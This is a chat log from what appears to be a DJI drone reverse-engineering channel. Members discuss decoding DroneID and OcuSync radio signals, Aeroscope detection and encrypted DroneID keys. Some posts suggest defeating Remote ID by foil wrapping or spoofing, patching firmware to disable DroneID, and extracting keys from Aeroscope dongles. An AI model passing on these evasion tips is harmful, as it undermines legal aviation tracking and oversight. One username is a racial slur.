[2023-07-25 18:06:32] quad808 : So, technically.....you build a quad, then wrap the remote ID broadcast unit in foil. Its still working, you are still legal, but hey...no one can pick up the transmission due to extremely limited broadcast range. Oopsie. But hey, I am not a lawyer, nor do I work for the FAA. My bet? DJI, unless specific country laws prohibit RID, will take the easy way out and enable it on all their drones, but we will see. We are already seeing it turned on in other countries besides the USA and Japan, even though no country requirement that they do so. Lets see how this shakes out.

[2023-07-25 18:17:09] dji-rev.concierge132 : I am sure they will close all loopholes once people start abusing stuff like this. Also, I think it's currently not illegal to spoof fake RID to make it harder to detect the real drone among the cloud of fake ones. @quad808

[2023-07-25 20:14:57] dkovar : It is illegal to spoof RID. I asked some qualified people about this and received some solid information showing how it is (likely) illegal. I need to go find it. But the two points that stick are: 1) FCC violation, operating an illegal transmitter 2) Interfering with manned aircraft in flight The specific citations exist, I just need to find them..

[2023-07-25 22:31:20] dji-rev.concierge132 : What makes a transmitter illegal though? You can have 5-10 drone modules attached to the pidgeon that is crapping on your backyard and that would be legal. Second one maybe if they can make a claim that they had to ground aircraft because of the fake swarm.

[2023-07-25 23:58:20] oakley75 : "...wrap the remote ID broadcast unit in foil"

[2023-07-25 23:58:41] oakley75 : Yep this. Even Ken Heron touched on it lol

[2023-07-26 00:00:12] oakley75 : It's a heat shield ha, play dumb

[2023-07-26 02:31:13] bitbangingbytes : Logic won't matter when you're explaining it to a jury of "your peers" and by "your peers" I mean people that understand nothing about technology and will be easily swayed by a lawyer, the more expensive lawyer.

[2023-07-26 06:48:19] juvatos : juvatos joined the channel.

[2023-07-26 09:01:06] joonas : idk man. the spirit of the law is that your drone must be broadcasting it's (and your) coords, not that it needs to have a rid module on it.

[2023-07-26 09:01:50] joonas : ofc you can argue loopholes and disagree with the law (i think as implemented it's shit too), but seems like a bit of a playing dumb argument to me.

[2023-07-26 13:19:05] jcase : This would only be legal in certain circumstances in the US, and the average consumer it would not be. It would be limited for DOD, and potentially law enforcement.

[2023-07-26 22:20:52] tissy : Looks like Aeroscope will detect the new Air 3 ```"90":"DJI Air 3"``` which is good news.

[2023-07-27 15:00:16] jcase : is this inferring the ID is 0x90 or decimal 90?

[2023-07-27 15:02:31] jcase : or does anyone know which app Air 3 uses? I could unpack and look, assuming it is using the DJI Pilot TWO? or perhaps they dropped a new fly?

[2023-07-27 15:42:51] konraditurbe : DJI Fly newer version

[2023-07-27 16:41:59] tissy : 0x90 @jcase

[2023-07-27 16:42:31] jcase : thank you

[2023-07-28 07:40:02] dreamtree : dreamtree joined the channel.

[2023-07-28 08:10:56] mobimore : mobimore joined the channel.

[2023-07-31 14:30:07] bignigger : bignigger joined the channel.

[2023-08-01 15:27:40] sachinkew : sachinkew joined the channel.

[2023-08-01 17:35:28] sachinkew : Please help me with disabling droneid from mavic 3t

[2023-08-02 22:54:57] razorfish : razorfish joined the channel.

[2023-08-09 17:13:31] negual : negual joined the channel.

[2023-08-10 14:37:24] lapse98 : Who is left for AS providers in the US? Knowing supply is limited.

[2023-08-10 15:05:48] dkovar : Dedrone, though it would be part of their larger offering. 911 Security, which is rebranding to AirSight. FlyMotion. Gresco sold to Aerial Armor. DeDrone bought Aerial Armor.

[2023-08-12 22:09:32] deonisray : deonisray joined the channel.

[2023-08-15 09:49:07] mainframe : we have #evo channel here and at least Evo2 series can be easily rooted. Just this info is not widely published. You need to ask :)

[2023-08-15 15:58:19] mstone : mstone joined the channel.

[2023-08-15 17:55:11] mstone : Air 2S: used CIA, showed disabled. Started with N1 and iOS, Litchi: back enabled.

[2023-08-15 17:55:11] mstone : Air 2S: used CIA, showed disabled. Started with N1 and Litchi, iOS: back enabled.

[2023-08-15 17:55:27] mstone : is the android app the only way?

[2023-08-16 03:17:20] dji-rev.concierge132 : newer SDK and Dji app re-enable it. Litchi uses newer SDK. You might be able to use old Litchi version that uses older SDK or just go back to old version of the DJI app.

[2023-08-16 18:50:01] mstone : bummer

[2023-08-18 07:03:55] whatisinmydrone : whatisinmydrone joined the channel.

[2023-08-18 07:34:45] whatisinmydrone : Anyone tested if its possible to disable/fake the droneID gps location on the matrice 30t?

[2023-08-24 18:56:20] bengutt : bengutt joined the channel.

[2023-08-28 03:46:54] mako918 : mako918 joined the channel.

[2023-08-29 23:22:07] enk2022 : anyone knows if AeroScope can detect Mavic 3 Pro or Inspire 3?

[2023-08-30 02:03:47] jeremybearimy20 : jeremybearimy20 joined the channel.

[2023-08-30 11:09:43] jcase : mavic 3 pro for sure, idk why it wouldnt detect an inspire 3, DJI hasnt rolled out the new droneid variant as far as i know

[2023-08-30 11:55:21] tissy : Inspire 3 is within the definition type table (type 76), so as @jcase states, no reason it should not be detected but haven't physically confirmed.

[2023-08-31 14:09:12] theufodroner : Where can you find the full table?

[2023-08-31 17:35:15] the_lord : Aeroscope detects the Inspire 3, Air 3 and M350

[2023-08-31 17:36:03] the_lord : it detected all latest drones

[2023-08-31 19:10:40] convair : convair joined the channel.

[2023-09-04 01:29:52] enk2022 : :+1:

[2023-09-04 01:30:00] enk2022 : thank you

[2023-09-04 18:50:53] vcka : vcka joined the channel.

[2023-09-08 16:56:50] dong : dong joined the channel.

[2023-09-08 19:57:06] aholtzma : anyone have any Ocusync3/LB1/LB2 spectrum recordings they'd like to share?

[2023-09-10 20:48:38] masskiller : masskiller joined the channel.

[2023-09-11 15:23:37] woland : woland joined the channel.

[2023-09-13 10:14:08] molda : molda joined the channel.

[2023-09-19 14:22:20] leperdu : leperdu joined the channel.

[2023-10-03 19:18:54] lapse98 : Anyone know what model starts with F6Z9?

[2023-10-03 22:37:27] the_lord : Mini 4

[2023-10-04 01:15:29] lapse98 : Thank you

[2023-10-10 07:41:33] ginostred : Hi, does anyone know if the Air 3 and Mini 4 pro transmit droneid and therefore are detectable by aeroscope? Or they only use the new Remote ID for identification?

[2023-10-10 13:04:44] tissy : Both platforms are detectable by Aeroscope.

[2023-10-15 20:49:30] dumldore_newbi : dumldore_newbi joined the channel.

[2023-10-19 01:24:01] shuke : 有人知道大疆mini2如何修改上升下降以及前进速度吗，dh好像调了没用，求教程

[2023-10-19 14:58:16] w3c : w3c joined the channel.

[2023-10-20 11:57:47] jdan7387 : jdan7387 joined the channel.

[2023-10-21 06:55:07] shuke : 有人能分享一下迷你2参数对应的什么值吗？

[2023-10-21 12:46:08] baxove : Hi, I fly my Mini 2 with airplane mode on all the time, and I have disabled the privacy bits with CJD to improve privacy as much as I can. Is there any point in also enabling Local Data Mode in the DJI Fly app if the phone is always in airplane mode? And does disabling the other privacy settings like "Mobile Device GPS Info" and "DJI Device GPS Info" improve privacy in my case?

[2023-10-21 18:14:51] oakley75 : It is redundant yes since the app has no internet access. That being said, I always disable everything anyway and use local data mode. I guess there's a risk of unintentional connection if you have a saved SSID, and disabling everything would limit somewhat what the app is collecting/logging. But I'm sure you know already not to ever store a WIFI password. I run a firewall as well. Not necessary, sure, but I can sleep soundly at night with this setup. Also only use Fly 1.5.1.10 to preserve CJD.

[2023-10-21 18:14:51] oakley75 : It is redundant yes since the app has no internet access. That being said, I always disable everything anyway and use local data mode. I guess there's a risk of unintentional connection if you have a saved SSID, and disabling everything would limit somewhat what the app is collecting/logging. But I'm sure you know already not to ever store a WIFI password. I run a firewall as well. Not necessary, sure, but I can sleep soundly at night with this setup.

[2023-10-21 18:14:51] oakley75 : It is redundant yes since the app has no internet access. That being said, I always disable everything anyway and use local data mode. I guess there's a risk of unintentional connection if you have a saved SSID, and disabling everything would limit somewhat what the app is collecting/logging. But I'm sure you know already not to ever store a WIFI password. I run a firewall as well. Not necessary, sure, but I can sleep soundly at night with this setup. Also only use Fly 1.5.10 to preserve CJD.

[2023-10-22 01:58:18] adyo-dji : adyo-dji joined the channel.

[2023-10-22 07:01:24] baxove : Thanks for your answer. Yes, the phone I am using is never connected to the internet, and there are no saved SSIDs. The Fly version is 1.5.10. I guess I will disable Local Data Mode if it's redundant so I can see which direction the RC is in the compass view.

[2023-10-24 17:33:57] caseygibson : caseygibson joined the channel.

[2023-10-27 19:04:44] mgracio : mgracio joined the channel.

[2023-10-29 10:57:00] alex7593 : alex7593 joined the channel.

[2023-11-02 13:26:14] dhsacxz : dhsacxz joined the channel.

[2023-11-07 16:59:54] dumldore_newbi : Do i understand the following right: 1) DroneID = RemoteID 2) remoteID = (Network Remote ID, Broadcast Remote ID)

[2023-11-08 09:39:48] tom87 : tom87 joined the channel.

[2023-11-08 15:40:04] dkovar : DroneID = DJI's capability to broadcast information about their UAV's location and the operator's location to their own "sensors", Aeroscopes. RemoteID = The U.S. FAA's "digital license plate" for UAVs. Not networked, just broadcast via Bluetooth.

[2023-11-10 14:15:03] alex7593 : https://github.com/proto17/dji_droneid

[2023-11-13 09:21:57] dumldore_newbi : Thank you

[2023-11-20 09:21:19] asuka_331 : asuka_331 joined the channel.

[2023-11-24 08:06:35] s1m0n : s1m0n joined the channel.

[2023-11-24 14:51:35] wr2475973835 : wr2475973835 joined the channel.

[2023-11-25 19:53:51] tom87 : I'm trying to adapt the script for decoding DroneID to work with the other Ocusync data. The packets seem to be fine so far, but I'm not sure if the scramble code is the same. Can anybody help me with that?

[2023-11-27 13:06:36] tmbinc : The scramble code is not 0x12345678 like in the DroneID-packets, but also the ZC sequences are different.

[2023-11-27 13:08:14] tmbinc : It's all derived from a "seed", i.e. the hopping pattern, the scrambling and the usage of ZC sequences all derive from the same thing. I'm unsure how the actual encryption (AES) key is also derived from this or not. How far did you get with demodulation of the signal? Can you synchronize well to timing and frequency, i.e. do you get a clear constellation?

[2023-11-28 04:22:03] enigma2 : all @tmbinc comments are GOLD .

[2023-11-30 04:41:56] eseven : Last weeks DJI has deployed a new firmware (and gadget for standalone devices) to upgrade Aeroscopes. I'm inspecting the firmware and I cannot see specific differences at least at main board and wifi part. Seems that the only part evolved is Occusync part, but I need more time (and help) to evaluate it. Does anyone knows why DJI is deploying this new firmware?

[2023-11-30 22:01:03] jcase : yes, its to allow decryption or the new droneid standard, that is encrypted

[2023-11-30 22:01:37] jcase : which is stupid, as that done is not needed, they are doing it to hide the decryption key

[2023-11-30 23:49:07] nmikus : Did they push this out to the drones or just the AS units?

[2023-11-30 23:53:49] hito_no_yume : I have done a bit of work on this quite a while ago. Try mini 2 downlink, and look at the first symbol. You might find a golden sequence there if your demodulation is right :wink: Hint: how can you determine if a given sequence is golden sequence?

[2023-12-01 11:14:19] eseven : Have you seen if encryption applies to all three protocols? I've seen weird validation flows at wifi part, covering also actual one. I supouse that decryption is done at main board part, to not use "models" extra CPU.

[2023-12-01 14:16:53] jcase : should be both

[2023-12-01 14:24:43] tom87 : I look at the very first package too. What do mean with, I can find a gold sequence there. I decode all data, 6 packages with 6 symbols (between the zc symbols). Do you have one more hint? Please?

[2023-12-02 06:22:54] nmikus : I see 2 new AS pkt types but don't see where they decrypt them

[2023-12-03 23:51:53] hito_no_yume : Focus on the first symbol after the first zc symbol. Rest of the packet would make this more complicated, just ignore them for now. Play with this script to understand how golden sequence generation works: https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/generate_scrambler_seq.m Basically it takes x2_init value as a parameter and generates a sequence. If you look at enough bursts for Mini 2, you will see a golden sequence in the first symbol after first zc, but it uses a different init than the one used in DroneID.

[2023-12-03 23:55:13] hito_no_yume : Actually, one more thing came to my mind I forgot to mention. There are some additional data in the first two symbols which you need to remove. I call them pilots, but don't really know what they are. DroneID don't have these I think. Another hint for you for these additional bits/symbols in the packet. Just turn on the drone without turning on controller, and work on this part of the communication. For many bursts, bits should be almost identical except these pilots.

[2023-12-04 05:46:54] tmbinc : Oh, I didn't know! So some actual subcarriers need to be removed? That may explain my issue why I was able - for non-drone-id - to find a good goldcode match for symbols 2+, but not for the first two.

[2023-12-04 08:58:54] hito_no_yume : Yes indeed, you need to remove those subcarriers from the first two symbols. I don't know if they carry any meaningful data, I couldn't see one. Easiest way to find locations of those subcarriers is to use drone only on transmission.

[2023-12-04 17:32:42] tmbinc : 4 out of every 20 bits? Does that sound about right?

[2023-12-04 17:53:12] tmbinc : So with that, I get 2400 - 2400/20*4 = 1920 header bits, that seem to have 78 bits of information that is repeated. Then, the gold-code restarts.

[2023-12-04 23:52:44] hito_no_yume : That sounds about right. Golden sequence you found will be the same after controller turns on and demodulation is still the same. That part of the communication is handshaking, eventually when the controller is on, encryption will start and the packets will look much different other than the header part

[2023-12-04 23:54:02] hito_no_yume : That sounds about right. Golden sequence you found will be the same after controller turns on and demodulation is still the same, just more turbo block sizes. That part of the communication is handshaking for exchanging encryption key, eventually when the controller is on, encryption will start and the packets will look much different other than the header parts

[2023-12-04 23:54:40] hito_no_yume : I am getting interested in this again :smile: maybe I should go back to trying to decrypting it again

[2023-12-04 23:57:08] tmbinc : I'm working on a capture that was made directly after the RC was turned on, where they eventually sync. Any hints on how to decode the 78 bits? I would naively think that if data is repeated after 78 bits, that would be the 3 turbo buffers of n*8+4 bits each, but 78 % (3 * 8) != 12. (Unlike Droneid, where 4236 % (3 * 8) = 12)

[2023-12-04 23:57:19] tmbinc : Is everything turbo encoded?

[2023-12-05 00:08:28] hito_no_yume : I couldn't get to decode that part I think. My suspicion was that it is convolution encoded. 78 / 3 = 26 bits which is a possibility for conv. encoder.

[2023-12-05 00:24:05] tmbinc : Ah ok. But the remainder of the packet, i.e. everything after bit 2400, is Turbo encoded? E.g. in my first packet bits repeat every 348. Hence I would think it's a 14-byte packet, turbo-encoded. How do I find the right offset for the systematic buffer? For DroneID I guessed a lot... but it helped that there was a valid CRC.

[2023-12-05 00:32:56] hito_no_yume : Your assumptions sound correct to me. Rest of the decoding is very similar to Drone ID. You just need to use the right turbo block size and the rest should just work, rate match turbo decode CRC etc.

[2023-12-05 00:37:04] hito_no_yume : I am not sure what you are referring to with systematic buffer though. I don't quite know the internal implementation of turbo decoder, but same stuff from drone ID should work with some size changes

[2023-12-05 00:41:40] tmbinc : "systematic buffer" - just the one of the 3 turbo buffers that contains the data itself, not the parity. (I don't decode parity right now so I just extract the data)

[2023-12-05 00:44:46] hito_no_yume : Wow, that is very impressive and much more complicated than it needs to be :smile: Maybe just give this tool a try with right sizes and then you should be able to CRC check: https://github.com/proto17/dji_droneid/blob/main/cpp/remove_turbo.cc

[2023-12-05 00:45:14] tmbinc : E.g. my first packet contains the following 348 bits repeated: ``` 000000100100000001000000000000000000001000100000001000000000000000000000000000010000001001000100000010000000100001101000000010000010100010100100100001000010001010100100101110001001101000000000011000111010100110100000100000000010111010100110000010001001001001000000011000000010000000100011000010001001001100010011000100010000000101001101010100010000 ``` I don't know the offset, but if I try to turbo-decode with any of the 348 offsets (block size always 116 bit), I don't see anything with a valid CRC. Is it the same crc16 as the droneid, or the crc8?

[2023-12-05 00:45:50] tmbinc : ooh, I never checked the actual crc24 I think

[2023-12-05 00:45:54] tmbinc : ok let me try this

[2023-12-05 00:51:05] tmbinc : That worked! \o/ ``` 341 0000000000000000000008a1813970 ``` (i.e. at offset 341)

[2023-12-05 00:56:08] hito_no_yume : Nice! It does look like what I would expect from that part of the communication.

[2023-12-05 01:09:45] tmbinc : And then of course bit-reverse every byte

[2023-12-05 01:09:51] tmbinc : and then it's RRC packets :))

[2023-12-05 02:16:16] hito_no_yume : I actually didn't know they are RRC, learned something new today, thanks for that :smile: I was just assuming these packets were just a dji thing, never thought they would be part of LTE

[2023-12-05 09:03:37] tmbinc : Oh, it's .. DJI RRC. They just like to call them LTE-ish terms.

[2023-12-05 12:29:29] stjian : stjian joined the channel.

[2023-12-05 20:18:17] mike.t : mike.t joined the channel.

[2023-12-06 13:14:34] dumldore_newbi : where did you got the informations about the new firmware? Is it only based on your research? Can't find any public "official" information about the "new" droneID

[2023-12-06 16:50:50] aholtzma : It is something they cooked up entirely or RLC/ASN.1?

[2023-12-06 23:05:19] tmbinc : Entirely cooked up

[2023-12-07 12:05:32] nopexecutor : hm, haven't looked at Ocusync for quite a while... last I was able to do was to decode and decrypt DL, e.g. with video feed from OcuSync 2; I saw now there is 3 and 4, right? Anybody investigated those, or the UL signals?

[2023-12-08 01:56:03] hito_no_yume : There you are :smile: Thanks to your hints. I managed to decode the ocusync downlink, I couldn't get to decrypt yet, but now the Christmas break is coming, I will go back to decrypting it. I might start bothering you again :smile:

[2023-12-09 01:53:40] qq134520 : qq134520 joined the channel.

[2023-12-14 11:30:23] dkovar : I'm looking for an open source Remote ID -receiver- (not DroneID, not a transmitter) that runs on COTS hardware such as an ESP32 (e.g. LilyGo T-Beam). The Android apps are unreliable and the commercial units are far too expensive.

[2023-12-14 13:21:11] tissy : Did the code I sent you not work @dkovar ? We don't have DJI remote ID in the UK, but certainly picks up the BT / WiFi RemoteID.

[2023-12-14 14:56:00] lapse98 : One of four listed at GitHub https://github.com/PeterJBurke/RID

[2023-12-16 10:32:39] nonefx : nonefx joined the channel.

[2023-12-18 00:51:55] notdan : notdan joined the channel.

[2023-12-18 16:02:16] quad_fan : Again, @dkovar, Remote ID is not guaranteed to be broadcast via Bluetooth. Spec outlines more than just BT.

[2023-12-18 16:57:46] dkovar : Could you elaborate on this? What do you mean by "not guaranteed to be broadcast via Bluetooth?" I know of no vendors of UAVs or RID transmitters that are using anything other than Bluetooth.

[2023-12-19 04:28:00] eseven : @dkovar There are different vendors that transmit WIFI. DJI, Parrot and Autel does.

[2023-12-19 04:30:38] eseven : And Not all of them transmit using "standard" channels (6,..) but complying with standard. Standard says to transmit at faster pace if not standard channels are used.... ;)

[2023-12-19 15:14:17] dkovar : Yes, but they are -all- transmitting Bluetooth.

[2023-12-21 06:58:11] eseven : @jcase decrypt applies at modemarm code?

[2023-12-21 12:32:21] moyivo8659 : moyivo8659 joined the channel.

[2023-12-22 11:42:19] sparkyws : Is this code available? i would like to try it @tissy

[2023-12-23 05:41:20] mehr : mehr joined the channel.

[2023-12-27 21:18:34] dji-noob : dji-noob joined the channel.

[2023-12-28 00:33:55] hostile : For those that are not aware... Bambu 3d printers (made by former DJI employees) is about to get it's first public firmware drop from a 3rd party. https://www.youtube.com/watch?v=XcfYgCXaANA

[2024-01-03 20:22:40] tom87 : @hito_no_yume , I have to bother you again. I captured the first package from the drone ten times after reboot, without RC. And all 600 subcarriers are identical. I am focused on the first symbol directly after my first ZC (403). Is there any other way to get the gold sequence?

[2024-01-03 20:22:40] tom87 : @hito_no_yume , I have to bother you again. I captured the first package from the drone ten times after reboot, without RC. And all 600 subcarriers are identical. I am focused on the first symbol directly after my first ZC (403). Is there any other way to find the sub carriers which should remove before getting the gold sequence?

[2024-01-04 10:53:04] herespam : herespam joined the channel.

[2024-01-07 13:04:54] dumldore_newbi : Decode DroneID directly on a SDR: https://www.youtube.com/watch?v=OcaRNos_Hj0

[2024-01-09 16:24:13] tom87 : gold

[2024-01-11 07:55:52] dubliss76 : dubliss76 joined the channel.

[2024-01-12 19:16:46] jcase : Hiring. Come work with some of the best cellular, embedded, UAS and CUAS hackers the world has to offer. Remote, well established company. Not a flaky startup. US based preferred. Multiple positions available. Reverse Engineers, Exploit developers, App developers, embedded engineers, rf engineers We have fun toys, and great BBQ. If you follow android, Nintendo or DJI hacking, you probably know of more than a few of us. Jon@cunninglogic.com

[2024-01-13 14:18:09] dkovar : Absolutely encourage people to look into this opportunity. The company is very well established and has an excellent reputation.

[2024-01-13 14:31:15] konraditurbe : Not many people with the level of skillset jcase and other OGs have.

[2024-01-13 15:04:47] jcase : @dkovar thank you. I'm trying to get more talent before I have to take leave for surgery.

[2024-01-13 15:04:52] jcase : but dude that means a lot

[2024-01-13 15:53:49] dkovar : You've directly helped me out for years, and I've known the company for almost as long. You all are good people.

[2024-01-13 15:54:35] dkovar : You've helped me out for years, and I've known the company for almost as long. You are all great people.

[2024-01-13 17:36:38] jcase : yeah, first company ive stayed with for more than a year (5 yrs with company, 6 on my contract)

[2024-01-13 17:36:45] jcase : only place that ive always felt respected

[2024-01-16 14:36:10] zjm605186980 : zjm605186980 joined the channel.

[2024-01-16 22:38:51] drone_paki : drone_paki joined the channel.

[2024-01-17 01:08:07] enk2022 : According to the paper "DJI drone IDs are not encrypted": https://arxiv.org/ftp/arxiv/papers/2207/2207.10795.pdf There are two types of DroneID packets, Fig 9 and 10. Have anyone ever seen the packet format in Fig. 9?

[2024-01-17 04:10:52] eseven : @enk2022 Yep, you can find both of them even a third one.

[2024-01-17 09:45:21] photogrant : photogrant joined the channel.

[2024-01-17 13:45:31] knorz : knorz joined the channel.

[2024-01-18 09:08:13] slickstretch : slickstretch joined the channel.

[2024-01-18 15:43:17] basilius : basilius joined the channel.

[2024-01-21 11:56:20] neuralz : neuralz joined the channel.

[2024-01-22 09:26:51] ghhh : ghhh joined the channel.

[2024-01-26 17:07:38] jcase : therea re more than 2 types, and newer ones are encrypted

[2024-01-26 17:08:00] jcase : off the top of anyone's head, does anyone know which key is used to decrypt AS firmware? i cant get my notes now

[2024-01-28 22:32:22] hito_no_yume : Oh droneID is finally encrypted then? That is interesting, how did they manage to push the encryption key to existing aeroscopes?

[2024-01-28 22:35:03] konraditurbe : "Upgrade Module" physical device that plugs into aeroscope, allegedly.

[2024-01-28 22:36:32] hito_no_yume : That makes sense, if it was hidden inside a firmware update, I am sure someone in this group would have already extracted it. People here are amazing at what they are doing :smile:

[2024-01-29 14:45:09] jcase : hardly allegedly, i have some here

[2024-01-29 20:57:51] lining-preps.0u : lining-preps.0u joined the channel.

[2024-01-29 21:58:14] hito_no_yume : So theoretically, wouldn't it be possible to extract the key from these upgrade modules? Does this really provide a proper safety to make sure the key doesn't get leaked?

[2024-01-29 22:10:31] jcase : i know peopel disagree with me, but obfuscation and packing is a form of security. Security is a cost benefit ratio

[2024-01-29 22:10:42] jcase : if you can cost the attackers enough moeny and time

[2024-01-29 22:10:52] jcase : then you may win

[2024-01-29 22:11:04] jcase : that is what DJI tries to do with this, their use of ollvm and secneo

[2024-01-29 22:11:06] jcase : i mean, it fails

[2024-01-29 22:29:36] nmikus : anyone seen a drone that puts out encrypted droneID pkts?

[2024-01-30 04:46:45] eseven : dji mini 4 pro

[2024-01-30 05:18:04] nmikus : do you know which FW version they started sending encrypted pkts?

[2024-01-30 06:44:27] drone_fancy : drone_fancy joined the channel.

[2024-01-30 08:19:03] eseven : Last one from December.

[2024-01-30 08:29:31] eseven : Dongle is a 2 interfaces USB HUB. One interface used to "bypass" already connected USB (CrystalSky/4G Dongle). The other interface, with a USB gadget on it. The gadget is cross-correlated with an Aeroscope at first start. Then it will work only on that Aeroscope. (or not ;) )

[2024-01-30 08:33:53] drone_fancy : hi guys, I have a questions, could I use CIAJeepDoors to disable DroneID in Mavic 3 Pro/Mavic 3 Pro Cine?

[2024-01-30 10:42:38] jcase : No

[2024-01-30 10:53:08] jcase : Again cia jeep doors does not disable droneid

[2024-01-30 10:53:24] jcase : Please read the repo

[2024-01-30 10:53:34] jcase : Before applying it

[2024-01-30 10:53:53] jcase : Only certain drones and certain firmware

[2024-01-30 10:54:02] jcase : Have any benefits

[2024-01-30 11:07:26] pingspike : @eseven what's inside the "USB gadget" :smiley:

[2024-01-30 11:17:12] eseven : It is a gadget device, that responds to some specific commands. It is completely sealed, but has two test pins on it... Does anyone has experience on how to read/use those pins?

[2024-01-30 11:22:17] jcase : Top four are standard us

[2024-01-30 11:22:22] jcase : Bottom right is ground

[2024-01-30 11:22:32] jcase : Bottom left goes to a capacitor then to the ic

[2024-01-30 11:23:06] jcase : @eseven some capacitors, some resistors, a crystal and a ic

[2024-01-30 11:23:10] jcase : Err

[2024-01-30 11:23:16] jcase : @pingspike

[2024-01-30 11:50:01] eseven : Interesting.

[2024-01-30 20:42:19] serg.gangubas : serg.gangubas joined the channel.

[2024-01-31 02:03:06] nmikus : crypto looks like https://www.openssl.org/docs/man1.1.1/man7/SM2.html do they pull the private key off the dongle? or is it all just some gadget protocol?

[2024-01-31 02:03:06] nmikus : cyrpto looks like https://www.openssl.org/docs/man1.1.1/man7/SM2.html do they pull the private key off the dongle? or is it all just some gadget protocol?

[2024-01-31 03:48:53] eseven : They pull the key from the dongle. Could be based on elliptic algorithm SM2, but key requests seems to be dynamic on time. I thought it could be time based, but it I'm not sure, due many Mobile devices are not time synced. Then... any ideas?

[2024-01-31 04:39:37] nmikus : so you have the key off the dongle?

[2024-01-31 11:50:40] jcase : The symmetric key is pulled off dongle

[2024-01-31 11:50:55] jcase : The asymmetric stays on dongle

[2024-01-31 11:50:55] jcase : The asymmetric stays dongle

[2024-01-31 12:04:59] jcase : The symmetric key changes per packet, providing it is the entire purpose of the dongle

[2024-01-31 13:41:35] eseven : At packet, there is any reference to know which key request to the dongle? Afaik AS reuqest keys to the dongle..

[2024-01-31 14:26:59] nmikus : gross so they did it the right way, there is a hash of the symmetric key to track requests

[2024-01-31 16:04:08] nmikus : the symmetric seems to change per boot, the IV changes per pkt counter mode...

[2024-01-31 21:51:12] hito_no_yume : Does that mean the symmetric key, like AES key, generated per packet instead of being a fixed key? But then both drone and the dongle has to know how to generate this key? Shouldn't it be possible to find the dongle's logic in drone's firmware then?

[2024-01-31 21:54:04] hito_no_yume : Unless the key generated asymmetrically. Now I see it, drone generates the key using some dynamic information + dongle's public key, and then aeroscope sends the dynamic information based on the packet to dongle which then dongle decrypts using the private key and sends back the symmetric key, AES key or whatever that is.

[2024-01-31 21:56:11] hito_no_yume : Where do you guys find this implementation in the firmware? I would love to see how it is implemented there, seems like a really good and a secure design if it is really implemented that way

[2024-01-31 22:11:40] nmikus : fairly textbook in terms of using asymmetric to protect your symmetric key. So you get the speed of symmetric and the security of asymmetric...

[2024-01-31 22:21:32] nmikus : just need someone with HW skillz to crack one of these things open and dump the key

[2024-01-31 22:23:52] nmikus : how does one get one of these things anyway? does DJI just reach out to all owners of AS boxes or do you need to request one?

[2024-02-01 01:27:19] jcase : .... :)

[2024-02-01 01:27:59] jcase : Good luck under any circumstances if you are in a western country right now

[2024-02-01 01:47:43] jcase : It took me months to secure the ones I have.

[2024-02-01 02:06:24] nmikus : sounds fun

[2024-02-01 09:44:30] rachfly : what exactly? :)

[2024-02-05 04:18:47] anthony : anthony joined the channel.

[2024-02-06 19:57:57] ryantkasher : ryantkasher joined the channel.

[2024-02-07 14:36:25] drone_king123 : drone_king123 joined the channel.

[2024-02-10 04:05:10] avg.bob : avg.bob joined the channel.

[2024-02-12 07:47:55] mehr : internal IC of dongle . anyone knows the part?

[2024-02-12 07:48:00] mehr :

[2024-02-12 08:04:52] tmbinc : Isn't that just the USB hub?

[2024-02-12 08:22:00] eseven : Yep, an USB hub. Interesting part is at metal Dongle attached to it. (QR Code)

[2024-02-12 08:39:11] mehr : of course . that's right. my mistake. now the question is " part# of IC inside metal dongle " . generating a dumper seems interesting to me.

[2024-02-12 15:56:44] lapse98 : Looking for an AS sim to generate random traffic to help with software integration. Not getting enough traffic from actual AS.

[2024-02-12 16:03:43] jcase : is this an individual project, or a buseiness/government one? As I have such a thing

[2024-02-12 16:03:43] jcase : is this an individual project, or a buseiness/government one?

[2024-02-12 18:00:20] eseven : What Kind of traffic do you want to generate? flights?

[2024-02-12 19:03:44] lapse98 : Flights to push into software. Not looking broadcast or spoof. Not enough flights on Aeroscope February with our cold New England weather. Engineers need simulated data.

[2024-02-12 19:03:44] lapse98 : Flights to push into software. Not looking broadcast or spoof. Not enough flights on Aeroscope this February with our cold New England weather. Engineers need simulated data.

[2024-02-12 19:50:52] jcase : such a familiar sounding issue lol

[2024-02-12 19:51:06] jcase : i was damn near in the middle of the rainforest ... i never got flights except for me

[2024-02-12 22:33:50] konraditurbe : Yeah just sticks towards center and don't need to even take off of the ground

[2024-02-15 04:11:19] ghhh : Has anyone had success turning off the droneid on Air2S? CIAJeepDoor only changes privacy bits...

[2024-02-15 04:14:43] ghhh : I checked the hdvt_uav service and was able to stop the drone ID update, but could not stop the transmission itself.

[2024-02-15 04:14:43] ghhh : I checked the hdvt_uav service and was able to stop the droneid update, but could not stop the transmission itself.

[2024-02-15 04:14:48] ghhh : should i check cp.img ??

[2024-02-15 04:39:17] nmikus : to prevent it you would need to patch the modem/dsp code

[2024-02-15 05:08:46] ghhh : I know, but I just want to know which file I need to patch.

[2024-02-15 05:08:52] ghhh : I thought it was hdvt_uav, but it doesn't seem to be

[2024-02-15 05:14:03] nmikus : cp.img would need to be patched, and you would need to bypass the signature verification stuff

[2024-02-15 05:19:55] ghhh : thx.

[2024-02-16 15:17:44] robbe7730 : robbe7730 joined the channel.

[2024-02-19 06:25:02] vindia : vindia joined the channel.

[2024-02-20 08:18:06] weristdas : weristdas joined the channel.

[2024-02-20 15:50:33] jonathanselis : jonathanselis joined the channel.

[2024-02-24 11:44:02] efwefaf : Does anyone need a DJI T50 that can fly globally

[2024-02-24 11:51:50] fgzdf : fgzdf joined the channel.

[2024-02-24 12:18:35] jcase : @efwefaf i have interest in a t50, but i dont care if it can fly globally or not

[2024-02-24 12:21:18] efwefaf : Do you need to purchase T50

[2024-02-24 15:25:41] jcase : what price

[2024-02-25 17:40:54] efwefaf : 32000RMB

[2024-02-25 18:52:56] flylusive_pat : @efwefaf Do you have export license? They require certificate to export

[2024-02-29 00:04:28] joelg : Any way to keep drone id disabled with ios yet? Air2s

[2024-02-29 09:15:04] zkar : Are there known ways how to gain root access on recent FW versions of the aeroscope?

[2024-02-29 09:16:59] zkar : I do remember ways about shell injection but I assume that this is closed now?

[2024-02-29 16:20:45] jcase : I have a totalphase 480 usb analyzer im looking to sell. Made many an android and a DJI exploit using this tool. US Based, have box and all tidbits that came with it. Looking for $700, they are 1300 new and 800+ used on ebay. I dont want to deal with ebay. If you are working on the decryption dongle, you probably want one of these.

[2024-03-01 10:31:17] zkar : Can recommend that. :+1:

[2024-03-01 11:30:08] jcase : they rock, im trying to avoid the ebay route lol

[2024-03-01 11:30:20] jcase : i have long standing issues with the ebay security team lol

